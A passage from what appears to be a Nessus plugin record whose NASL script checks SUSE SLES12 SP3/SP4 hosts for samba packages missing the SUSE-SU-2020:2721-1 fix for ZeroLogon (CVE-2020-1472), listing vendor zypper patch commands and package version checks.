"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2721-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2721-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143864);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2721-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nFixed an issue where multiple home folders were created(bsc#1174316,\nbso#13369).\n\nFixed an issue where the net command was unable to negotiate SMB2\n(bsc#1174120);\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174316\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202721-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c4b90b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2020-2721=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-2721=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2020-2721=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-2721=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP4 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP4-2020-2721=1\n\nSUSE Linux Enterprise High Availability 12-SP3 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP3-2020-2721=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-2721=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-2721=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libnetapi0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-credentials0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-errors0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-hostconfig0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-passdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamba-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsamdb0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbconf0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libsmbldap0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libtevent-util0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwbclient0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-client-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-debugsource-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-libs-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"samba-winbind-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc-binding0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libdcerpc0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-krb5pac0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-nbt0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr-standard0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libndr0-debuginfo-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libnetapi0-debuginfo-32bit-4.6.16+git.237.40a3f495f75-3.55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", 